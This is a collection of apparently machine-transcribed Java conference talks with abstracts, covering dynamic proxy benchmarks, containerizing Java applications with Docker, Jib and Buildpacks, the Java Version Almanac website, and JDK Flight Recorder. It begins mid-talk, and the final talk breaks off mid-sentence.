method. So it's horrible. However, if you set accessible true on the method, then after that, it won't, it won't ask again. It'll just say, okay, fine, just go through. Because the methods are all public anyway, it really shouldn't make a difference, setting them to be accessible. And so we do that as a way to speed things up a bit. And it does make a difference. Our benchmark is going to have two very simple methods, increment, incrementing along and consume CPU, which is just going to do, you know, cons blackholder consume CPU too. So it's very, very full work. And the reason I do such little work is because the way we've done the dynamic proxies in all the infrastructure code here, it's quite efficient. So if I'm doing any more work, we won't really be able to measure the difference between dynamic proxies and not using dynamic proxies. It's really fast, as we will see in a moment. Here's analysis of the increment method. And if I call it directly, it takes about 2.9 nanoseconds per operation. Now this is running on my 162 MacBook Pro. But I turned off the CPU turbo boost so that it's always running at sort of the, I think it's 2.4 gigahertz or something, 2.5 gigahertz. So it doesn't, it doesn't wave up and down. Normally what happens is that your CPU will be clocked up if it has a lot of work, but if it gets too hot, it'll get clocked down again. So heat and workload has a big impact on performance results. And it's just very hard to get consistent results that way. Also what I did was I chose the best results, not the average results. And so these gave me the most, most accurate results. So the, the best, the direct call was 2.9 nanoseconds. Stattec proxy was 3.5. That's the handwritten one. Then the dynamic proxy direct call. Here I'm cheating a little bit because I'm using dynamic proxies, but I'm, what I'm doing is I'm, I'm, I'm not using reflection to call the actual method. I'm just calling the correct method directly. And the code's not actually correct, but it's, it's fast, as you can see. Then the direct dynamic proxy reflective call with the methods being turbo boosted. That means I've said accessible true on the methods. And 9.7 nanoseconds versus the static proxy, which is 3.5. So that's the comparison we need to do between those two. And if you don't have the turbo boosting on, the method turbo boosting, then it's another 2.3 nanoseconds slower. If you look at the results, in the rightmost column, you'll see that for the direct call, no bytes are generated. Also not for the static proxy, because it's just a primitive. So why should that allocate memory? And then our parameters, so it shouldn't allocate any memory. However, for the dynamic proxy, reflective call, it allocates 24 bytes on each method call. And it doesn't matter if escape analysis is on or off. It always allocates 24 bytes. And this object allocation is going to have an impact on our performance. Can't get away from that. Then the consume CPU, we can see the direct call 4.8.
Java frameworks often need to dynamically create classes. One approach to do that easily in Java is dynamic proxies. In this talk, we will show how they compare to hand-written classes. We will then examine how we can use dynamic proxies to reduce the amount of code that we have to write.
10.5446/52797 (DOI)
Hi folks, welcome to this talk about containerizing Java applications. I'm Nicola Frantl, I've been a former developer, architect, whatever, and right now I work as a developer advocate. Since the trend about containerization started, I became very interested in Docker and Kubernetes and all the surrounding technologies. I work for a company called Hazelcast, and Hazelcast has two products. The main one is an in-memory data grid, and you can think about an in-memory data grid as distributed data data structures. So you can short your data and replicate your data over different nodes over the network. The second one is Hazelcast chat, and it's an in-memory stream processing engine, so it leverages the distributed nature of Hazelcast's time-dg to do this stuff. Today I won't talk about Hazelcasts, I will just use it, and I will talk about how we can containerize our Java app. So let's start with a non-Java app, with a Python application. And how do you containerize a Python application? Well, it's quite straightforward, actually. You iterate from Python image, you add your file that contains the dependencies, you install them, you add the script itself, and then you run the scripts, and it's done. LikeWIFE for a Node.js application, you iterate from your nodes, and there's image, you copy the file that contains the dependencies, you install the dependencies, and you run again the script. And all of those scripting languages have in common is that, well, there is no intermediate bytecode, there is no compile phase. So the main gist is to iterate from the right image, to iterate the dependencies, and to run the script. It's wussy-weir, what you see is what you run. Whereas in Java, it's slightly more complicated, because we have several layers. Well, the first one is actually the JAR that might contain all the JAR, depending on how you want to run it. And here I'm using HazelCost as a dependency, but again, it's not warranted. Then you have your jivm, and then you have your Docker. And in my sample app, I have a REST endpoint, I want to expose the REST endpoint to the outside world, so I can put and get data in HazelCost. So how do we do it? Well the easy way is we create the JAR outside of Docker, so we just mvn a clean package, and then we have a Docker file that wraps it. Let's do it. So here I have my application. It's a string boot application, because in the end, I will show you how you can use it with string boot, but it has only to dependency the web for the REST endpoint and HazelCosts. And then nothing mind-blowing. It's just very straightforward, and the Docker file is just, hey, just copy the JAR file and put it in Docker, and then run java.dashjar the Docker JAR. So here I will be caging the application and the n clean package. Then I will build the Docker from with the Docker file, and because I'm lazy, I will just do that. I won't do it every time, because in the end, in some alternatives, it can take quite some time. Here it's pretty straightforward, but later options can be quite time-consuming. And now I can Docker run dash dash or M, because I don't want to keep it in the end, and P, because I want to be to expose the ports to the outside world, and it's called string in Docker column five. So the application starts. I have HazelCosts running in the background, and now I can check and I will put some data first, exposed HTTP, localhosts, 8080, let me say world, it's put, because I don't know my own application. Now it works, and then I can curl, edge, to check that the data is still there, 8080, and yes, it's here, I can put another stuff and say hello, Nikola. And yes, so I have my data. So that's the straightforward things to do, and it works. But the issue here is that we actually need to build first jar outside of Docker, and then we use Docker to package the jar, which is not super straightforward. So the next step is to run the entire build inside of Docker. So here I have my updated Docker file, and to run the build inside of Docker, we actually needs to have a compiler. So we inherit from a GDK and not a simple GRE, and we do our like, black magic, we copy the MVN folder, because we are supposed to be independent, and we run the package, skip the test, because of course there are no tests, but anyway, and it works pretty well. And now if we do the same, so I will get back to the terminal, I will stop this one, I will run 1.0, because I already like created it before. And now I can check that it still works. So it's the data that is still there, everything works as expected. And yes, it works, but there are several downsides, and the biggest downsides is we embed a GDK in the final image, and it has two, like, big issues. The first is an increased size, and we want our Docker image to be as small as possible, when possible, and the biggest issue is actually the fact that it can compile Java code, so you will actually deliver in production an image that can compile code, and it's a huge security issue, you never want to do that. The second problem is about version handling. As you noticed, I need myself to set the version when I build the Docker image, so I need to remember that this version of the POM is the same as the version of the Docker build, I need to keep them both in sync at the same time. And finally, there is no layering, so what do I mean by that? You know that Docker images are layered, so you inherit from the base image, and you add some more stuff, which creates another image, this image itself can be a parent image, and so on and so forth. And the idea is that you can keep the previous images if they were not changed, if they were not touched. Docker doesn't need to rebuild them anymore. And now we have this drawer, and this drawer, as soon as you change a library, as soon as you change a class file, as soon as you change anything, you need to rebuild the whole Docker image. So, how can we see that? Well there is a nice stuff called dive. So what we will do is we will dive into the image, so I will stop it here, and I will dive into sprint in Docker 1.0. Takes a bit of time, of course. And here, this is how it looks. So here I inherit from this base image, you can see there was some installation going on, and here I was not the one to copy several things, and here this is what I did, this is what I added to my image, this is this mvn package where I skipped the tests. All the rest is in the returns from the previous image. And here, this is the issue that this mvnw package adds the whole stuff on the other side, and as soon as I change anything, well it will rebuild the whole image, including fetching the dependencies. As I mentioned, you need to redo everything, and parts of the build is to fetch the dependencies. And it's not great fetching the dependencies, as you know that Maven, but every build tool that relies on all the jobs, they don't load the whole internet, and through alternative dependencies here, you can see that there are a lot here. So every transitive dependency is here, and we don't want that. So how can we do better? One way to do better is actually to do multi-stage builds. And multi-stage builds allows you to, inside the Sandocker file, to change the base image. So you can copy a file from a previous stage into your current stage. This is pretty widespread, it's really a great thing to use, but if you are using Skaffold, Skaffold is the tool that lets you configure your Docker to automatically publish the Kubernetes, either locally or micremote, probably locally. So the problem of multi-stage builds is they are not compatible with Skaffold, so be careful about that. Otherwise, this is how it looks like. I will need to quit that. Please let me quit. Yes. And I will just use the multi-layer here. So now I have two different layers. I have two different stages. Sorry about the semantics. The first stage is about building and I'm using a JDK. And once I get the drawer, I use another stage where I use single JRE and I copy the drawer from the previous one into this image. So this ID here and it's 1.1 and if we dive into it, as you can see, here I have like many, many less layers and more importantly, here I have one single drawer. I don't have the dependencies issue that I had before, which is a bit better. Still I have this drawer layer and the problem of this drawer layer, again, if I change a class file, which will happen all the time, I will need to rebuild everything. I don't need to fetch the dependencies, but I need to rebuild the drawer. So the next ID is to start thinking about the drawer as a distribution unit, but actually your Docker image is also a distribution unit and they are pretty redundant. Without Docker, JAR is the best distribution unit you can get, but with Docker images, they are useless because running a JAR inside Docker image, why don't we just run the JAR exploded? And that's the train of thoughts of the people behind the JIP plugin, which is a standard of Mavin plugin. And with JIP, you just like configure your Mavin PON to use JIP and it also works with Gradle and it can either push to a remote Docker repository or to the local Docker. You can add a lot of configuration options, including choosing the parent image and it runs the exploded JAR and there are a lot of benefits. Well the first one is there is no Docker file because probably all your Java Docker files will look the same, so it's no use repeating them over and over. The second benefit is you have an automated version and from the POM. So if your POM is version X, then JIP knows that it will create version X of the Docker image. And then there are different layers. So there are dependencies and resources and compile code, meaning that the compile code is the stuff that changes the most. And there is no issue, well there is not, it's not useful to every time get the dependency again or copy the resources again if only your code changes. So this layered way of doing things is actually the best because if you change the compile code, the code, you compile the code, you only change the utmost layer. Depending on how you look at things, the one which is at the bottom or at the top, whether your parent is at the top or at the bottom. So that's pretty smart and actually in the latest version, you have four layers, one is about snapshot dependencies because snapshot dependencies are supposed to change more often than simple dependencies. And so it handles that for you. So let's do that and let's see that here in this, here I've removed the Docker file entirely, there is no Docker file anymore, but I've added the JIP-Maven plugin. And here I'm telling it that it will create the image and as you can see it syncs the image version with the project version and the layers look actually very nice. So I need to remember its version 2.0, I will dive into it. And here you can see that here you've got the parent stuff and here you've got the JIP-Maven plugin, the first one is about the libraries, the second one is about the snapshot libraries, again because they change more often. The third one is about the resources, so I have the files and the final one is about the compiler code. So if I need, just need to change the compiler code, all the previous layers will be kept and the building of the image will be much, much faster. Also with JIP you can configure and for example to change the parent image. So here I will be using an Alpine gearing to keep the size of my final image smaller and if I do a Docker image is grab, spring in Docker. We can see here that I have Russian 2.0 and 2.1 and the 2.1 uses the Alpine parent image. So you can see I have a few megabytes which can be a good thing if you've got a small image you want to put them very small. The next option if you've got a spring boot application is you skip the JIP plugin entirely and use the spring boot mechanism. And spring boot is also able to create a Docker image that is nicely layered by default to have like the same ones as in JIP, the dependencies, the resource, the snapshot dependencies and the compile code, different order though, but you can customize them. So if you know that some parts of your applications are going to change much more often than others, you can have a dedicated file, an index file that tells you, hey, this package or this stuff you will put it into this layer and this other into this layer. In order to do that, however, we need to get back to a Docker file. So here is how you do it with the spring. And I have a Docker file again and it's like a multi-stage build. You can see here you have three stages. The first one creates the package, creates the JAR. Then you have a second one that actually explodes the JAR and the third one will actually run the application through like a specific spring boot mechanism. This is a lot of work, but instead of doing that by ourselves, it would be much, much better to let somebody else do it. And that's the ID behind the BuildPacks. BuildPacks are backed by the Cloud Native Foundation and it's a tool that's able to understand how to build your project. So if you remember, if you have been doing cloud stuff since some years, you might know about Iroku. And when you were using Iroku, you would just like push, you would get push your sources to Iroku. And then Iroku on their own servers would try to sniff what kind of project it was and build it accordingly. So it would say, oh, I see a pump file. So it's probably a Maven project. So I will build it with Maven. And right now, this like way to do stuff was finally seemed to be worthwhile. And Iroku was joined by a team where PyVol told Tensu, I don't remember what their name is right now. They were joined by Spring. Now they both provide this like standard of BuildPacks. You've got a lot of configuration options. But you can pretty much do what you want with some limitation, of course. So the ID is that you've got no Docker file. It's scaffold friendly, and because I'm using the Springboots project, it knows it's a Springboot project. So it can use the previous four layers or if you customized it, all the layers. However, there are some downsides as well. Again, we get back to the fact that there is no sync between the pump and the Docker image. It's not that there is no choice of the parent image. It's a very limited choice. And if you want to change the parent image, you need to put an image that is compatible and I try to dive into it. It's just not some labels. It seems to be a pretty, pretty complex and dedicated process. I've noticed it takes a long time, even without changes. So perhaps I mismanage it, but for me, it's very long. It's especially very long because the build images, they don't move it every time. So every time it downloads the TDK again. So you can do it by running, first you need to install the build pack, then you run pack, you set the parent builder, sorry, and it will infer the build image. But why do that? With the latest version of Springboots, we can do the same inside of Maven or Gradle and it will use it under the cover. So how do we do it? It's quite easy. We just run, sorry, not here, here. We just run spring, mdm, always mdm. Springboots builds image. Again, the process is very, very long, so I won't show it to you. And in the end, this is what we get. We got rid of the Docker file again. And here we have the layer configuration enabled. And as you can see, nothing had changed otherwise. So the plugin itself knows how to create Docker images. That's pretty good. And the really, really nice stuff is that there are configuration options and it's very easy to change the configuration option to use Graal VM and to build a Graal VM native image. For example, here, that's the last stuff I want to show you, to create a native image that just adds an environment variable, the dp-boots-native-image-true, and that's done. And if we check again about the size of the images, so they are here. Here you have the Springboots inside a GVM. And here you have the Springboots inside a normal native process. So if you are interested in cloud stuff, if you want to have fast startup time and low memory consumption, then you can just use these kind of images. And it's a wrap. I just want to finish by mentioning the Docker squash. You can try to flatten the layers. In this simple application, I tried to flatten the layers from 1.0 and it was less than one person gain of the size. And from the 5.0, it was again less than one person gain of the size. So depending on what you value, if you value faster build time or smaller image sizes, you might want to check Docker squash. Might depend on your use case and probably on your parent images. But with the sample, my layers were nicely done so Docker squash doesn't bring any benefit. So as a recap, when you want to Dockerize your Java application, you must think about several things. You must think about the sync of the version between the pump and the image. You must think about organizing the layers to develop faster for your builds to be faster. And probably forget about squash though it might have seemed super popular at some point. It's not anymore. So thanks for listening to me. You can read my blog, you can follow me on Twitter and more importantly, if you want to try everything that I do here, everything is on Github. So thanks a lot and have a good day.
While a plain Dockerfile gets the job done, there are actually many more ways to containerize your Java app. They come with a couple of pros, and some cons. As “the Cloud” becomes more and more widespread, now is a good time to assess how you can containerize your Java application. I assume you’re able to write a a Dockerfile around the generated JAR. However, each time the application’s code will change, the whole image will need to be rebuilt. If you’re deploying to a local Kubernetes cluster environment, this increases that much the length of the feedback loop. In this demo-based talk, I’ll present different ways to get your Java app in a container: Dockerfile, Jib, and Cloud Native Buildpacks. We will also have a look at what kind of Docker image they generate, how they layer the images, whether those images are compatible with skaffold, etc.
10.5446/52801 (DOI)
Hello everyone, to the next session. The session about the Java version Imanak. The Java version Imanak is basically a collection of data about the history and the future of Java currently mostly presented as a website. During the presentation I will have a look how I created this data collection, why I created it and some things I learned during this little site project. First some words about me. My name is Mark Hoffmann. Actually I'm a Java hacker since the very early days, since the very early public, the first, the public release which was Java 1.0.2. Java at the time looked like this. This was a Java doc at the time. There was no Java doc actually. This is basically web rendering of some documentation which was done with some word processing. In total we had just eight packages, eight Java packages. This was the whole JDK. For example, if you look at the UTIL package at the time, this was the whole UTIL package. There was no data containers like MAP or LIST or SET. There were only two implementations like Vector and Hashtable. If you look into that, this is how it rendered at the time. This is how the web looked in the 90s. It was fancy to have images for headlines like the constructors or methods headlines here. Really nice. Also the beginning of Java was, as we know, on the client side. The entry point was the Java applet. My first commercial application I worked on started with a Java applet embedded in the browser. From the applet you could start frames and open separate windows. The runtime environment at the time was the JVM embedded in the browser. This is how everything started. Over the years I became involved in open source development. Probably one of my best known projects is the Java CodeCoverage Library, Chacoco. It's a integration into Eclipse called Eclema. Out of that work, mostly in the area of quality assurance and testing, I started to contribute to OpenShadyK. Over the years I also visited many conferences and had opportunities to speak at conferences. Finally, I became an organizer of an unconference or helped to unorganize the conference, the Jay Creed on the wonderful island of Creed, together with Heinz Karpuz and others. A couple of years ago I was also nominated as a Java champion. Let's have a look back at how the early days of Java looked like and how Java was released. After 1996 when Java 1 was released, we got Java releases every two years, two or three years. And these Java releases were released at one point in time. We could use them for many years in production. And there have been updates. And it took a couple of years until there was the last public update of the Chacoco. So over the years the API evolved, we got new language features and the tooling, the compiler, everything improved over the time. But what we can see here is things involved more or less slow. So for example, between Java 6 and Java 8, there was eight years between those releases. So at the time, as a Java developer, it wasn't very stressful. So you could learn a version, JDK version, the new APIs and could work for that for years. And this also was criticized of Java. And I want to show you a tweet which summarizes nicely. Like in 2016, people were complaining, Java is doomed. It involves so slowly. Every good idea takes ages to be available. And just two years later, the perception was very different. Like Java is doomed. It involves so quickly, nobody will be able to keep pace. Daniel Fernandez tweeted that. I really liked that. And if we look at the timeline after 2016, we'll see maybe the reason why this is. Since Java 9, we get new Java releases, major releases every six months. So two releases a year. And every release contains new features, new APIs. So Java now evolves really quickly. But if you have a closer look, it's like only every three years, there's a long-term support release. So as you can see on this diagram, the feature releases between the long-term support releases are end-of-life immediately when the next release is done. So you probably will not use that for production, because it's only maintained for six months. And there's maybe one or two updates at most for these feature releases. So now, every six months, you see new features. And if you really want to keep pace and really want to attract the new features, you really have to follow the OpenJDK project and see what's going on there. I told you before that I'm also working on this bytecode library, the Chacoco CodeCoverage library, which is based on bytecode. And with all these releases, we get new language features, maybe new JDOM runtime options for the bytecode processing. And this also leads me to the point that I really need to understand what are the new features of the virtual machines to make Chacoco available even for the latest Java versions. And you need to test that if you see that later. So my motivation to start the Java Almanac was basically we have a high frequency of releases. And I was curious what are the new language features for each release, what are the new APIs and the new bytecode options which are there. And this is, for example, the test matrix for the Chacoco project. Currently we test on 13 JDK versions from 5 to 17 and make sure the tool runs smoothly on all of these runtimes. So how did it all begin with the Java version Almanac? So I did a lot of notes from presentation I attended or for presentation I gave myself. And over the years I got quite a collection of information about Java. And at one day I started collecting and writing down this information in a public GitHub repo. This looks like this at the time. This was basically just markdown files and you could browse them here on the GitHub interface. And I wrote down information about each release and what are the Java enhancement proposals for the JVM, for the language or even in the library and the APIs, what happened here. Why markdown? I mean markdown is a text format and it can be put on a version control so that's a natural way to work with. I also started using markdown for example for presentations. So the presentation you're currently looking at is completely written in markdown. There's a small framework called Remark.js which renders the markdown nicely as slides. And some people even write entire books in markdown. For example the one by Eremi, it's called the guide to modern Java. I think it's working progress but it has some really interesting chapters and everything is written in markdown with lots of examples embedded here. You might have a look. And finally I decided to put that into, to convert that in a website to make it more accessible than the GitHub user interface. And this was actually when the java.amannac.io website started. In case you haven't seen it before, the idea here is to have mostly reference information immediately accessible. For example this version matrix provides direct links to the API, to the language specification, to the release nodes. And there's also comparison between the APIs. So for example we see what are the new APIs in Java 17 in comparison to Java 6. I will show you later how this is done, how this is created. So I wanted to have like a one-click reference because I basically created the project for myself for my daily work. I wanted to see what are the new APIs and want to keep an eye on API changes. Also been learning new features, especially language features. For me it helps a lot to actually write about it and to write down how things work. This helps me in learning new things. So I wrote a couple of articles about new language features and I call it indip's content. We will have a look at that later. There's many distributions of OpenJet.ac nowadays and the site should be many-neutral. So also I included commercial distribution, commercial products on the site for reference because if you live in Java and Java coding you might end up actually using commercially supported products. And this is a lot of content and this is all spare time work. For me it is important to automate as much as possible. So especially the data collection and the update of the data and the publishing should be automated where possible. I show you how this is done. This is a quick architecture view of the backend of the site. It basically uses GitHub infrastructure and a little bit of AWS components. For the GitHub there's basically the repository where all the content of the site is stored and maintained. The content consists of text files again marked down and wherever possible I try to convert the text files into structured data, JSON data to make it accessible also by other use cases or for other use cases. This data and the text is converted into a static website. And for the static website rendering I picked the Hugo static website renderer. This is written in Go. It's very powerful, very fast and I really liked this project and it's actively maintained. You see a couple of releases every year. I really liked it. So in case you need to create a static website, Artus Markdown documents really have a look at the Hugo project. The website is then stored on AWS. It's free buckets and along with static content which is not created by Hugo, for example like historic Java doc or historic documents, I make it accessible on the site. Everything is then made accessible through the web and with public endpoint also with SSL termination, HTTPS and here AWS CloudFront is like a handy and cheap tool to have a frontend for your web projects and there's also the frontend for Java sandboxes. We'll talk about that in a minute. This is another nice feature I added to play with new Java versions. As I told you, I tried to be data driven, work to be data driven where possible and I show you some examples here. For example, the information about every release is a structure, is a JSON document where for example release dates and documentation links are included. And with the Hugo rendering process, this finally then converts in a nice HTML website with all the information included here. The same is for the API divs. The API divs are created by some process. We have a look soon about this process and the files are created from the div. Here, for example, is a difference between Java 9 and Java 8 and here we see not very human readable, we see a structure of all the changes in this between two versions and in the HTML it renders like this. Now it's really accessible and this is the new and deprecated or changed APIs in Java 9. And here's something said in Java 9 actually the Java applet became deprecated. So how everything started now. Applet is not the typical framework we use for application development nowadays. Nowadays, Java is at least in my context mostly used on the back end and the applet that started everything in 1996 became deprecated with Java 9. You can also see all the other changes between Java versions and it's basically a matrix. The site allows you to compare any Java releases and the API between any Java releases. Also, there's quite a few options nowadays to actually use OpenJDK. There's many renders and they provide different packages for different platforms and I wanted to have an overview of all the possible options to install Java for a specific platform if you want to have a specific Java version and also collected that data in structured documents and for example the adopt OpenJDK. Here you see what platforms are supported for for example the version 8 and these are all the platforms for example if you want to run Java on your Raspberry Pi you will find the corresponding package at OpenJDK. And this then also renders on the site and for each Java version down here there's a table with all the different vendors. You see it's quite a few vendors nowadays that produce OpenJDK builds and there's also quite a few platforms you can use OpenJDK for. And finally because at least I do some work with Java bytecode I added a little reference with Java bytecode. There's different sortings. You can see all the opcodes and most important for me is I can directly jump to the specification and see the definition of these bytecodes and how they work exactly. So the hard part actually is collecting the data and keeping the data up to date and as I told you I tried to do as many things automated but there's lots of manual collections and manual updates still for the API divs. These are actually generated so there's a process in place that compares to APIs and creates these JSON files with describing the difference. And here what is really really helpful is actually a dockerized JDKs. So for all the JDK versions or for the most JDK versions you will find docker images for example for adopt OpenJDK and also for the OpenJDK project itself where we see early access releases like Java 17. I mean Java 17 is not yet released. You will find very current and up-to-date early access releases and this is really nice to test new JDK features. So if you want to follow the latest Java releases and the current development I really recommend having a look at the early access builds and if you don't want to install them locally just use the docker images. So there's quite a few JDK versions. We keep track and where we compare the APIs and for this it turned out to be very useful to use matrix builds. This is a feature also for the GitHub actions and what you hear basically do you run the same build with many different parameters. In this particular case we run the build to extract the API with different docker images. This is the docker image name we use or the base image and this is then the JDK where we analyze the API and find the differences on bytecode again. So go through the the Java library and process it with ASM library and extract information about the signatures of the class files. For the vendors the list of vendors you can study the websites you can study their websites and some of them provide REST APIs where you can get information about their download artifacts and instead of manually reading the websites if there is no REST API you can do some HTML scrapping just if there's tables of information just try to get the information out there and here's something I want to share with you because when I did the try to implement some HTML scrapping I came across a little library called Jsoup and in case you need to collect information systematically from the web I really recommend having a look at that library it's really great. So in this case if I want as an example I want to grab some information from the Java Almanac I.O. page itself let's see here's the table and the table has here links to the the java doc they are called API the text of that links and now the challenge is to retrieve all these these links here and that's actually pretty pretty simple with that with the jsoup library so you connect through the endpoint for example for get call you can also do like post if you need to provide parameters and then the nice thing here is that you select elements HTML elements with the CSS selector so you don't have to write code that iterates through the document or searches some string tokens for example this case I want to see the element which is in in the table in the row and then in the cell and we have the link which contains the text API and this is the element we get and we print out the the URL this link points to so that's a really nice and powerful tool to collect data from the web. The sandbox for every java release the site contains a sandbox with the latest a version of that release for example the latest the access version and this allows me to test and try new features without local installation I can just go on the website and for example with Java 17 we have a new API to format binary data as hex strings you might have done this before in your career as a Java developer converting text representation of binary data in both directions probably everyone of us did this before and now finally we have a nice and handy API and the util package which allows doing that for us and we can directly run it in the sandbox here and the code is now compiled and executed on some backend service like the docker containers that execute this text so how is this done on the front end the the snippets are directly embedded in the markdown files this is a nice feature of the Hugo renderer you can have like little macros here and this allows me to embed like source code directly into the website and then wrap up with the sandbox and make it executable for the editor here you see like a nice editor I figured out that the eighth editor JavaScript editor is like a really nice and embeddable library where you have syntax highlighting and the typical features you expect from a programming editor and for the interaction and the control I decided to use the u framework basically because I'm not a web developer and I didn't want to set up node and everything in the u framework you can just embed and just use as a library without complex build setup for that in the backend the the travel code is actually not executed in the browser there's some service in the backend that compiles and and executes your snippets this runs in docker images and it uses the compiler API of the chatty k so the chatty k has some tooling APIs where you can basically use most of the jdk tools also via API and this also holds true for the compiler here's an example you can get this java compiler interface and then directly feed in source files and compile them and for example this case we do it in memory so the source files are compiled are not written to disk at all everything is done in memory and this is possible with the tool API of the open of the chatty k compiler and again we want to have sandboxes for all the java versions so matrix build is our friend again we've seen that before we're providing some data to the build in definition and have separate or different parameters of the build for all the java versions up to java 17 and for the docker files we use there's also a nice feature we don't have to duplicate it and have to write a new separate docker file for every java version docker files can have arguments and for example we can put the define the i need to scroll up a bit so you can see that the the base image can be an argument and so you can reuse the same docker file for all the different java versions this is really nice and of course we try to update this regularly like every night a github action runs another nice thing about github actions is also that you can schedule them periodically and then the jadk or the sandboxes are updated so in this case for example the java 17 sandbox here at this point in time is the early access version number build number five as i told you before the site also has some articles about jadk features for example all aspects of method references and here the sandbox is also very useful because example snippets can be directly embedded on the website and also executed on the website and readers can try and fiddle around with the syntax and see how things work and especially on the new java versions without having to install the corresponding jadk case and most of the articles in the meantime are provided by kai hostman this is a nice cooperation kai is a creator of great java content and java books so you might check out his website hostman.com you will find lots of nice articles about java and also references to his books so maybe you have a look at that because i'm a big fan to share knowledge and to learn together of course everything is open source i decided to use the creative comments license so you are basically free to share and adopt the data and do whatever you want with that as long as you stick with the as long as you share it again and all content is in the public repository so there's no secret content whatever you've seen here all the data behind that is publicly available in the git repository which is also linked on the site due to the fact that everything is open source in public we have a nice cooperation also with fuj you've seen the previous session and data for example about the java versions is also rendered on the fuj.io page and they basically take the structured data the json files and render this in their context we also share data about the open jdk vendors and product and in the next session you will learn about how this is done at fuj.io. Gerrit Grunwald will show you how they provide an API for the vendors and the open jdk products so some outlook so what are my plans and what i want to achieve in the future first of all there's for the api diffs currently there's only technical api diffs really the method signature but it's not about semantic or documentation and the open jdk project provides some diffs where not only the api but the java doc is actually compared and you can see diffs here what changed actually into java doc this might also be an interesting piece of information and it would be nice to have diffs on the java doc also i would like to embed also examples for the apis so if you see new apis it would be nice to have a collection of examples how to use these apis and the idioms how the new apis are supposed to be used the data the json data you've seen before currently just sits in the git repository and it would be nice to also have them available through an api like in rest api that is also in discussion with the foodjad.io project and currently looking for technical solution how to make this data available thinking of like a static rest endpoint generator or something like that and finally in my wildest dreams i would like to create a sandbox for oak so oak was the predecessor of java like internal project the sun at the time and this is how everything started and i think it would be really really cool to have a sandbox with the original oak runtime but i have no contacts and i don't know whether the source code actually exists or binaries still exist of the oak runtime and the oak compiler but it would be really nice to maybe find some resources about this and actually write an oak sandbox where you can study and see how everything started 25 years ago so thanks a lot for attending this little presentation if you have any questions i'm around for the next minutes here and i'm happy to answer your questions thank you
Even though it is 25 years old, Java is still a modern and one of the most used programming languages. For this, the language, the APIs, and the runtime have been dramatically improved over the years. As a Java developer since the early 1.0 days, the presenter has collected extensive information over the years and has finally put it together on the Java Version Almanac website. In this session, we take a look behind the scenes of the Java Version Almanac and touch on some trivia about the history and future of Java.
10.5446/52802 (DOI)
Hey everyone, my name is Marcus, I'm with Datadog and this presentation is going to be about things that I've learned over the past years using Flight Recorder and especially the things that I've learned over the past two years working with Flight Recorder at an immense scale at Datadog. So the agenda is pretty simple, I'll start with a quick introduction to the Flight Recorder and then I'm going to move over to lessons that I've learned and hopefully end with some demos, we'll see if there's time. So the Flight Recorder can be thought of as the data Flight Recorder of a modern aircraft, the thing in the black dot box that is recording things that are going on in the cockpit and different sensors like altimeters and stuff like that. But in this case of course it's recording what is going on in the Java runtime and what is going on in the application running in the Java runtime. So for the runtime it might be recording things like compilations and garbage collections and for the application it might be recording where the application is spending the most time on CPU or where you have thread holes. And it does this at a very low overhead of course because you wouldn't want your application to tell you to change behavior just because you have the Flight Recorder running just like you probably wouldn't want your plane to do that. So it does all of these things at a very low overhead. And there is a whole lot of APIs for controlling the Flight Recorder or contributing your own data into the Flight Recorder. And there is also a whole lot of different tooling available. So you have the GMSI, there is also a tooling included with JDK. And the Flight Recorder can be used to solve quite a range of different problems. And I'm going to be mentioning a few of them later. So this all started a long time ago with Swedish little runtime called Jrocket. It was not going to spend too much time on this slide but it was initially used to figure out what was going on in the runtime, what kind of applications and how the applications were utilizing the runtime. So we used it as a tool to optimize the runtime itself, not to find problems in customer applications. Of course, since there was a bit of an interest in this from customers and we needed money, we were a small Swedish company, we productized it and we called it Jrocket Mission Control. And after a few acquisitions Oracle owned Jrocket and after that, Sun was acquired by Oracle and then the JVM teams merged and then it was rebranded into Java Flight Recorder and Java Mission Control. And when this all was open sourced, it was rebranded because there were some concerns regarding registered trademarks and registered names or something like that. And it was rebranded into JDK Flight Recorder. And it was eventually backboarded into OpenJDK8. So if you have OpenJDK8 or above, you can be using the JDK Flight Recorder. And if you have Oracle JDK7 or above, you can use the Java Flight Recorder. Anyways, so inside there is a recording engine which record events into thread local buffers. And when those are full, they are copied into global buffers. And when those global buffers are full, you can either configure it to emit these buffers onto disk into a file repo or you can just keep on overwriting, reusing those buffers. So I mentioned that the overhead is very low with Flight Recorder and there are a bunch of different tricks that is being used to keep it down. One is to use invariant TSC for time stamping, so the timestamp counter is in the CPU. It's also using thread local native buffers, as mentioned in the previous slide, to record events into. It's using a very efficient format. It's not doing a lot of work when serializing these events into the buffers. It's using LB128 encoding to keep integer sizes down and some other tricks, but it's a very fast, quick, hands-off kind of serialization format. And it doesn't do much when it's emitting these buffers to disk either, by the way. It's also collecting data very cheaply, so much of the data points that are captured are already sort of stunning the path where that data occurs. It's not like we need to go through the entire heap again to find some pieces of information. We can piggyback on things that are already happening in the runtime, which makes much of the data very cheap to produce. And also, since it's built into the JDK, sometimes some abstractions can be skipped and internal data structures used. The API is the event and event layout, so sometimes it can be cheaper just because of that. It's also trying very hard not to change the runtime characteristics. So, for example, if you built a very naive allocation profiler, you would likely undo any chances of scalarization optimizations, whereas that won't happen. Your GC behavior won't just change radically because you moved over and turned on the flight recorder. So some other interesting properties of JFR is that they are self-describing the chunks, the individual chunks of information that are produced by the flight recorder are all containing the metadata required to be able to parse them. So the layout of events, type information, metadata, it's all in the individual chunks and they are repeated, so you don't need to go to the beginning of time to find definition of a new event when it was defined. That information will be readily available in every chunk. And these chunks are also self-contained, so all the information that you need to be able to resolve a chunk is in the chunk as well. So, for example, the constant pools. And there are some different ways that you can do chunk rotations. One of them is starting or stopping a recording. You can get a new chunk by creating a snapshot. You can do it by changing where the file repo is located. And there are some different ways to do this. This will be required information for later in the talk. And a flight recording itself is just a number of chunks, one or more. So every chunk itself is in itself a flight recording. Cool. So I thought I'd do a quick demo of the flight recorder. Okay, so in this demo we have a recording that I've already opened, mission control. And as you guys can see, there's a lot of monitor-enter events here. So, general monitor blocked. We're waiting to enter a monitor here, all over these different places. And one thing to note here is that it's not just stack traces here. Of course, obviously, we can see the stack traces here. They're all terribly exciting because it's a demo, but we can see how we ended up waiting to enter this monitor. But even more interesting is that we actually have some information about the exact time we waited on this monitor. We can see the monitor class, we can see the previous monitor owner, the monitor address, all things that might help us resolve this problem. So in this case, we can see, you know, we're obviously having a lot of synchronization on this logger. And it's just one instance that we're blocking on for all of these different threads. And we can see the stack trace to it. I'd also take the opportunity, I have another recording here, and the only reason for that is that I wanted to show you that, hey, we also have pretty graphs in mission control. And flame graphs also. So whatever we click, we can now get flame graphs for them. And we can also get graph views. Nice zoomable graph 